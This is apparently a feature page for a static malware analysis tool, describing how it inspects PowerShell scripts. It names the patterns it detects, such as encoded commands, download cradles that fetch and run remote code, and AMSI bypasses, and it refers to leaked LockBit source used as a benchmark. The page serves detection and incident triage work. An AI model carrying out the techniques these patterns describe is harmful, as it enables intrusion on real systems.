PowerShell Script Analysis
PowerShell is the workhorse of Windows post-exploitation. Decoder reads `.ps1` files statically and surfaces the patterns attackers rely on: encoded commands, `Invoke-Expression`, download cradles, AMSI bypasses.
What it is
Static, no-execution inspection of PowerShell scripts.
Why it's useful
Most malicious PowerShell is obfuscated; reading it by eye is slow and dangerous to run.
How Decoder implements it
Lexical scan for high-signal cmdlets, decoded base64 payloads, entropy on string literals, optional AI verbalisation.
When to use it
Any untrusted `.ps1`, IR triage, training material, blue-team workflows.
When NOT to use it
Live process behaviour — that needs ETW / sandboxing.
Practical example
A pasted script with `powershell -enc <base64>`: Decoder decodes the payload, flags the download cradle and shows the dropped URL.
FAQ
Glossary
- Download cradle
- A one-liner that pulls and executes remote PowerShell — a common malware staging pattern.
- AMSI
- Anti-Malware Scan Interface — the Windows API that AV/EDR uses to inspect scripts at runtime.
Related
Static malware analysis inspects code and binaries without executing them. Decoder runs it locally on your upload and surfaces suspicious patterns, entropy spikes and known indicators — no API key required.
Entropy is a statistical measure of how 'random' the bytes in a file look. In malware analysis, abnormally high entropy is a strong signal that a section is packed, encrypted or otherwise obfuscated.
AI-Origin Detection estimates whether a code artefact was likely produced by an LLM, and explains why. The goal is informed review, not gatekeeping.
Obfuscation hides intent. Decoder flags suspicious entropy, base64 walls, eval chains, and packing markers so reviewers can focus on what's actually hidden.
LockBit 3.0 leaked source provided a real-world benchmark. This entry walks through what Decoder flags and why — useful as a reference for ransomware patterns.